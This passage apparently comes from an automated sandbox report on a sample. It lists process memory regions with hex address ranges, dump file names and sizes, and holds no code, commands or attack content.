                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/2516-263-0x0000000005840000-0x0000000005841000-memory.dmp
                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/2516-264-0x0000000006250000-0x0000000006251000-memory.dmp
                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/2516-271-0x00000000063B0000-0x00000000063B1000-memory.dmp
                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/2536-178-0x0000000000000000-mapping.dmp
                                                                                          • memory/2568-180-0x0000000000000000-mapping.dmp
                                                                                          • memory/2572-145-0x0000000000000000-mapping.dmp
                                                                                          • memory/2588-207-0x0000000000000000-mapping.dmp
                                                                                          • memory/2592-123-0x0000000000000000-mapping.dmp
                                                                                          • memory/2604-204-0x0000000000000000-mapping.dmp
                                                                                          • memory/2620-201-0x0000000000000000-mapping.dmp
                                                                                          • memory/2628-308-0x0000000004A90000-0x0000000004A91000-memory.dmp
                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/2628-309-0x0000000004A92000-0x0000000004A93000-memory.dmp
                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/2672-314-0x0000000005190000-0x0000000005191000-memory.dmp
                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/2672-205-0x0000000000000000-mapping.dmp
                                                                                          • memory/2692-124-0x0000000000000000-mapping.dmp
                                                                                          • memory/2692-129-0x00000000020B0000-0x00000000020B2000-memory.dmp
                                                                                            Filesize

                                                                                            8KB

                                                                                          • memory/2692-127-0x000007FEEE7C0000-0x000007FEEF856000-memory.dmp
                                                                                            Filesize

                                                                                            16.6MB

                                                                                          • memory/2752-231-0x0000000000000000-mapping.dmp
                                                                                          • memory/2756-235-0x0000000000000000-mapping.dmp
                                                                                          • memory/2760-188-0x0000000000000000-mapping.dmp
                                                                                          • memory/2784-209-0x0000000000000000-mapping.dmp
                                                                                          • memory/2784-234-0x0000000000000000-mapping.dmp
                                                                                          • memory/2788-291-0x0000000001FD0000-0x0000000002C1A000-memory.dmp
                                                                                            Filesize

                                                                                            12.3MB

                                                                                          • memory/2788-292-0x0000000001FD0000-0x0000000002C1A000-memory.dmp
                                                                                            Filesize

                                                                                            12.3MB

                                                                                          • memory/2792-128-0x0000000000000000-mapping.dmp
                                                                                          • memory/2792-130-0x000007FEFC2E1000-0x000007FEFC2E3000-memory.dmp
                                                                                            Filesize

                                                                                            8KB

                                                                                          • memory/2792-131-0x0000000000570000-0x0000000000571000-memory.dmp
                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/2940-295-0x0000000002160000-0x0000000002DAA000-memory.dmp
                                                                                            Filesize

                                                                                            12.3MB

                                                                                          • memory/2940-296-0x0000000002160000-0x0000000002DAA000-memory.dmp
                                                                                            Filesize

                                                                                            12.3MB

                                                                                          • memory/2944-216-0x0000000000000000-mapping.dmp
                                                                                          • memory/2944-306-0x0000000004960000-0x0000000004961000-memory.dmp
                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/2944-307-0x0000000004962000-0x0000000004963000-memory.dmp
                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/2948-157-0x0000000000000000-mapping.dmp
                                                                                          • memory/2956-214-0x0000000000000000-mapping.dmp
                                                                                          • memory/2956-281-0x0000000000000000-mapping.dmp
                                                                                          • memory/2956-282-0x00000000024B0000-0x00000000030FA000-memory.dmp
                                                                                            Filesize

                                                                                            12.3MB

                                                                                          • memory/2956-283-0x00000000024B0000-0x00000000030FA000-memory.dmp
                                                                                            Filesize

                                                                                            12.3MB

                                                                                          • memory/2964-151-0x0000000000000000-mapping.dmp
                                                                                          • memory/3000-252-0x0000000000000000-mapping.dmp
                                                                                          • memory/3008-221-0x0000000000000000-mapping.dmp
                                                                                          • memory/3008-226-0x0000000000200000-0x0000000000212000-memory.dmp
                                                                                            Filesize

                                                                                            72KB

                                                                                          • memory/3008-225-0x00000000001D0000-0x00000000001E0000-memory.dmp
                                                                                            Filesize

                                                                                            64KB

                                                                                          • memory/3016-199-0x0000000000000000-mapping.dmp
                                                                                          • memory/3040-303-0x0000000001022000-0x0000000001023000-memory.dmp
                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/3040-302-0x0000000001020000-0x0000000001021000-memory.dmp
                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/3060-238-0x0000000000000000-mapping.dmp